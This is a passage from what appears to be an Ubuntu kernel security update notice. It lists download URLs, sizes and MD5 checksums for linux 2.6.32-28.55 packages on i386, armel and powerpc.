\r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 91624 bcbe8c8d98d48410527533f3007a234f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 91686 f20edaefcf78de1acb42bc7dfc73dd3d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 305264 65d2f2b8130265389f4b1cadc06026ba\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 306270 0cc555fbd5fedafcf8604433b2940f8d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 4313792 4b1a5efbefe4b32e93e992484016f0bb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 4443756 18e9623a1a15c76256786ed2ee0581ca\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-28-386_2.6.32-28.55_i386.deb\r\n Size/MD5: 763818 10988467352dd82b5b70556fcdadcdd0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-28-generic-pae_2.6.32-28.55_i386.deb\r\n Size/MD5: 765720 1a3a3aa15834a9e78f9949a543988d6b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-28-generic_2.6.32-28.55_i386.deb\r\n Size/MD5: 764418 327887ed989e7d8eb60fc57705da7008\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-28-386_2.6.32-28.55_i386.deb\r\n Size/MD5: 31494606 2886b2a9dfc41789f139ffd9973ec15f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-28-generic-pae_2.6.32-28.55_i386.deb\r\n Size/MD5: 31608926 f6a9140fb2565b60b8d1962fedf5ad84\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-28-generic_2.6.32-28.55_i386.deb\r\n Size/MD5: 31536668 06327237124811828ea41d4ca15fef0f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-28-virtual_2.6.32-28.55_i386.deb\r\n Size/MD5: 12014576 c0e3196e9a6b98905f5251aa7189e2ee\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-28.55_i386.deb\r\n Size/MD5: 806034 5545c31f13cf057f5c22246c4aaa2de5\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-28_2.6.32-28.55_i386.deb\r\n Size/MD5: 215178 27b72f4f18ce22a7559059b37236d875\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 183210 abad66e8631784da80387710d3189aae\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 183396 6f055ed524c2419ea243657070f1aa4b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 249680 5797f6bcb011f94015aabdd943d8a4ce\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 252340 25efde9649f6a0d27b926872c9d5ba69\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 33838 2fd0dde45b528f7da8848cb314c529cc\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 33860 1778f8b3795cc28c3d2dae93bc5589bb\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 310430 4c7c842a43d38f826a811d3b439aa84f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 310482 a17033c679f451a5fa0383c9e6194257\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 2535012 9432d2858d8049e8f804cc5d1f437a3e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 2553322 1725a4123cf8b56d168914463fd47e62\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 147202 7804fc9392a0f38bba1a0c4849da9c4f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 147312 8ef5b6368178d25724f383e3b7fe332d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 228920 8ea36133d511f9e88ee07509727a3d25\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 228964 f4bdfd55c2df44e74c8830c8890a13f0\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 166082 c4697ef917da52d222e61640b21bda03\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 166166 5ee5e7262f065f4a865ce8393a3eed18\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 36360 853a79509ca9c3df4957313d57b5cb87\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 36492 1f05408305302143a8fb5e9670c06221\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 157022 78d5bbc417dbc3cbb0fdc4c89a745c91\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 157272 17c43c4b62744f6e58cfe8ba0d18e885\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 90196 efe5beb504e05584f1caaab752b24b5e\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 91094 4db5778b11f957deffeb23b9ea3153aa\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 48108 e3f8f401b0d65d692e53fee967c08285\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 48158 697e8e6d02eaf492fbeb5064a33812ef\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 9106 907bf6c225b443455497de45a26a1ba3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 9116 357727982d8deb8c24dd34b18eb9382a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 37460 afe07d04eee785d0ae4650662e4f2d1c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 37468 ce9c6eafb690e6b7667d0b258ac0e705\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 94002 566753f8bc1215e570cc1626d0a2e891\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 94598 5fb38544dad0535f5b1a3d268d4f7897\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 1584132 9656a768ccb23cc4d6618183e6c8e3bc\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 1535710 2a02e22d340adc80f8e90bdcd2deb282\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 37970 2c9616b89eaed2578830cf60f10f09ef\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 37976 aab753d35004d56903e34227c8fa8829\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 15568 c774cee308abec787ba383e28f36fb85\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 15566 1b439d6a6a19fe89053053144174a123\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 50070 5369cf31c9b435f3de2a33037125d9de\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 50104 179ccc7329ece83cfd58b4781605de87\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 123834 1364b73c03759e76eddb05a73c83987f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 124258 cac3e1816d3d0a197272c50c18358208\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 15520 43a53ed3b87e1480e00e8b3f44fc9c9b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 5702 333ef371c00df5d80d7094f4c387575b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-28-generic-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 20766 180cea9380b3d4f233d6e7c691edf721\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-28-generic-pae-di_2.6.32-28.55_i386.udeb\r\n Size/MD5: 20788 8cc8f03ba601fe2b861fc15d6c6c11ae\r\n\r\n armel architecture (ARM Architecture):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 129346 35c10010fc262c708eea3bbe3a6ab8bc\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 43446 c6b502028dbeee9d5e9c10fc6054b673\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 87662 55fe7d574a06938e061606cb0205d03d\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 91778 1030a2f5a3f2c4b87a8d4c9a874aa62e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 3196298 7d3ce0be68e7140a815d09a433bc0b5e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-28-versatile_2.6.32-28.55_armel.deb\r\n Size/MD5: 741512 8d23e2f5694479d9e3a15c9619c3191e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-28-versatile_2.6.32-28.55_armel.deb\r\n Size/MD5: 20172262 c5e30641489b10f1b2500bd0022daf44\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-28.55_armel.deb\r\n Size/MD5: 802482 38ab178808f434667414b220b306241c\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 166298 cccb578ce226580abee5beb39a51e4f8\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 279278 ee994a0d3442c558a3c9bd32582e36f1\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 448026 172ddd3c15e6f10e49d6f79a2f75b302\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 226740 cb584a1931a6cd12fdb74dae3ad96e42\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 95490 1f28369ec8c963a47a596e9dccf66aac\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 38076 c16d0e283f79fee75e6226f2566e4a79\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 94522 7cd6adf1fdf3ad3d8c97816917a0639c\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 55152 652835261e10c020a6bbda613511dfce\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 14858 8f1947ff1325de7a1200e69fe3c99be1\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 209762 6ccb2d5dabceacf2be3a7a212db883f7\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-28-versatile-di_2.6.32-28.55_armel.udeb\r\n Size/MD5: 21174 4653164f36f71f6a20fbc206c7914a70\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 340846 342574e72d46b43872631956a81ca060\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 281656 c99b2354371cdcfc49fdb9c53734bc36\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 60554 1ce39f363e9ecce3d7e3d0254abe1637\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 68706 16f4f4cc060e4e5e2648268db9475d62\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 48400 64c4c045f943fead31da3ccc9cf0312a\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 53146 ad4abfba83c9a356a84334c59013e807\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 96776 e90ba316de8885d7affd4f6924b579ae\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 109866 de29990d7e1c419586a2ed084580871c\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 41006 ea971cd9ee3ca9a57da748d05aa377c8\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 40386 e7c8b8ca459102c2519e8fd36ba22d19\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 598886 66a9062da78076213478dbb48d46bb35\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 632294 2f1614fe89875141759e4dbce0d7c5fb\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 155072 66d992a0e87516a6dee229a4b6bd3e36\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 150520 7d8c7e07a13e314f95cec5335aef84df\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 106246 5db80f4ed7a0652812b63873c015d91a\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 110212 070d3168ec87a50857420bb3dcdd1091\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 418886 e9776b46a5a75bfa663a188d6b79835d\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 355156 db90edb0acbe01b09ee22e301d9c951b\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 4229924 e49fb4d704bf43b8fff4d94cd2ae590e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 5630772 324e9369c69b8e50f313d37b2f9cf322\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-28-powerpc-smp_2.6.32-28.55_powerpc.deb\r\n Size/MD5: 868540 12522a095b75935adaf65598194aab3c\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-28-powerpc64-smp_2.6.32-28.55_powerpc.deb\r\n Size/MD5: 887460 b54d8677f133c7e4fc85c46c7abef141\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-28-powerpc_2.6.32-28.55_powerpc.deb\r\n Size/MD5: 867694 fbe0135e203b03bbeaa371b9a93486e5\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-28-powerpc-smp_2.6.32-28.55_powerpc.deb\r\n Size/MD5: 27774850 85c258300c559a231032205f8d6ff7e4\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-28-powerpc64-smp_2.6.32-28.55_powerpc.deb\r\n Size/MD5: 28644060 47b235820f65be01f49e64d1b4c826d3\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-28-powerpc_2.6.32-28.55_powerpc.deb\r\n Size/MD5: 27536364 7c20fe67a17ca7eae72513d6bda029cb\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-28.55_powerpc.deb\r\n Size/MD5: 795302 2f19543e98ff628f4a03b3a72a80de15\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-28_2.6.32-28.55_powerpc.deb\r\n Size/MD5: 231226 88d0091f363824a2e3543302d69988d6\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 244072 6ec3a9d46a8a7564b1b8b45542cd1d2f\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 257302 a9761720921c0c2f1568d971b0ab5cd5\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 221440 0569cb7844b6dac3d02e3a56a7555218\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 224134 b8010f57845a15142abe5558f9588a8a\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 31958 960bb13862d34f1dbbdaff9189b2e1c3\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 36482 cb4a4c845854325dc1ee952040b9c502\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 344026 227c274ffd2b3ab45bb55e8212a6efe3\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 385876 491cd4781b1780f74f9b163b6bf8b381\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 2174716 c2f6622c80d217bc25ba69bec5a7592b\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 2375316 0cd719dd702c2e7d91926701025a5ebe\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 222990 dbaebe110a46b3730a10fff26b25a618\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 217320 e2279d6c0791f136abafae6fa7f2ba44\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 260286 3841b8d30f7dec108c4c293d10d6161e\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 296370 bc115d10a5adb53956c3181b656548ef\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 132040 f31ef813def1c2e4cbdbee894bd3ca02\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 154928 ea6e2dac7854e0d4241b8cb9960ed197\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 50984 ba834ca89e2896542d1c82e65849b57d\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 45510 ee4bf7627276d2d217916065904a210f\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 108056 5b219598d1907932cc09af9757f7952a\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 123898 f43c8baae59c26c1d5dc56b5d07c39db\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 84348 0c2d566ddfdb44a7f7ed8091b91f9c72\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 89968 aee58d3bda4f9f62439aac72f957eb43\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 77240 4edd8f3836dc4e73433782bccafa2e7b\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 28412 cd7ccd96fab2cdf20beba291a1cbf03f\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 8956 bc8fbcded3baa77fdabed709ae466f36\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 10186 600571e6087e52b413a9ff7e5b0bf529\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 62108 59e310c46a73b6379269ce17c9a18c64\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 72512 013ac1c90862b3d152979f9d394a007a\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-28-powerpc-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 107194 6c508ca09c2c638887b7b7021f46e39b\r\n \r\nhttp://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-28-powerpc64-smp-di_2.6.32-28.55_powerpc.udeb\r\n Size/MD5: 136798 33e877aafc615d644e040292f534d777\r\n 